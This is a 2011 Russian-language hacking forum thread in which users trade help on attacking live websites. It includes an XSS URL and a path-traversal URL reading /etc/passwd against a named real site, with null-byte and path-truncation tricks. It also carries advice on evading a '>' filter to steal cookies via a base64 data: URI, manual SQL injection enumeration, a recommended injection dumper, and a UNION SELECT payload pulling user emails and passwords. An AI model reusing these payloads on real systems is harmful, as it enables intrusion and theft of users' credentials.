05.02.2011, 16:21
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Сообщение от Zalepoks
Код:
http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String.fromCharCode%28120,115,115%29%29
Может мне ктонить разяснить, что сделать здесь дальше ?
Код:
http://ontarioworld.ru/usercp/store/prem.php?p=../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
Мб подумать чуть-чуть? Ты второй похожий инлкюд за 3 дня выкладываешь, впредь тебе никто не будет крутить их,ибо самому думать надо!!!111
И зачем ты туда алерт впихивал ?о_О
Мб прочтешь уже что-нибудь, а то так и будешь задавать вопросы =/
Сообщение от DCrypt
~d0s~
, как ты узнал сколько ././././ вставлять?
Везде по-разном, где-то такой метод отсечения не сработует,где-то сработует. Вообще,если нулбайт не поддается экранизированию, то геморой с етим делать не надо,но этот случай как раз второй =/
Сообщение от fl00der
Путь посмотрел и посчитал вложенность.
Речь шла не о перемещение по каталогам ../ а про отброс расширения,т.к. там нулбайт поддается экранизированию, кароче если не понимаешь о чем вопрос,не надо пытаться ответить, темболее что я выше уже ответил.
|
|
|
05.02.2011, 16:34
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами:
8580980
Репутация:
0
|
|
~d0s~, как ты узнал сколько ././././ вставлять?
|
|
|
|
05.02.2011, 17:59
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами:
9157119
Репутация:
74
|
|
Сообщение от DCrypt
~d0s~
, как ты узнал сколько ././././ вставлять?
Путь посмотрел и посчитал вложенность.
|
|
|
|
05.02.2011, 22:47
|
|
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами:
8118326
Репутация:
-5
|
|
Добрый вечер. Вот такая трабла, в пасивном XSS фильтрируется ">"
Вот код, показывает куки:
id=348532&returnto=>" уже есть. А как отправить куки на моем сервере? не пашет, так как используется ">" дважды
|
|
|
|
06.02.2011, 03:49
|
|
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
С нами:
10139306
Репутация:
1089
|
|
Сообщение от rootmd
Добрый вечер. Вот такая трабла, в пасивном XSS фильтрируется ">"
Вот код, показывает куки:
id=348532&returnto=>" уже есть. А как отправить куки на моем сервере? не пашет, так как используется ">" дважды
в каждом отдельном случае надо смотреть как обойти фильтр, как правило надо смотреть обрезается только > или полностью код, панацеи тут нет как вариант помогает закодировать строку ну например строку alert(document.cookie) полностью заменяет такой код data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raW UpPC9zY3JpcHQ+
как видиш в нем не содержиться символа >
вобщем нельзя что то советовать , не видя конкретного сайта с уязвимостью
|
|
|
|
06.02.2011, 15:00
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Сообщение от None
~d0s~, как ты узнал сколько ././././ вставлять?
/thread98525.html
Для кого тему прилепили?
|
|
|
|
07.02.2011, 00:32
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами:
9285182
Репутация:
340
|
|
Да, конечно спасибо за то что искать направили. Поискал ещё часок. Никакого софта не нашел.
Проблема вот в чем:
Делаю ручками
LIMIT 0,1--
LIMIT 1,1--
LIMIT 2,1--
А это не совсем оптимально. Не удобно работать и времени много забирает.
Есть спец. софт который сам переберет базу и выведет все строки в удобном визуальном формате?
Нашел что то подобное. sql helper а ссылки все битые.
|
|
|
|
07.02.2011, 00:48
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
может кто знает про это я ниче норм не нашел
Drupal Droptor Module SQL Injection Vulnerability
http://secunia.com/advisories/43179
|
|
|
|
07.02.2011, 00:48
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
С нами:
8772211
Репутация:
56
|
|
Сообщение от Fooog
Да, конечно спасибо за то что искать направили. Поискал ещё часок. Никакого софта не нашел.
Проблема вот в чем:
Делаю ручками
LIMIT 0,1--
LIMIT 1,1--
LIMIT 2,1--
А это не совсем оптимально. Не удобно работать и времени много забирает.
Есть спец. софт который сам переберет базу и выведет все строки в удобном визуальном формате?
Нашел что то подобное. sql helper а ссылки все битые.
Я не просто отправил в поиск, а еще и дал ссылку на топик
/showthread.php?t=240692
Как вариант, пробуй rsaUnDumper[sql] – универсальный дампер SQL INJECTION.
|
|
|
|
07.02.2011, 01:04
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от Redwood
Я не просто отправил в поиск, а еще и дал ссылку на топик
/showthread.php?t=240692
Как вариант, пробуй rsaUnDumper[sql] – универсальный дампер SQL INJECTION.
rsaundumper хорошо работает многопоточно, но там не поддерживается(может пока) запросы через POST инъекций
А если GETом то вот таких уж точно не признает
555555' UNION ALL SELECT 1,2,(SELECT concat(0x7e,0x27,unhex(Hex(cast(user.EMAIL as char))),0x5e,unhex(Hex(cast(user.PASSWORD as char))),0x27,0x7e) FROM `db`.user LIMIT 10000,1) -- a
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
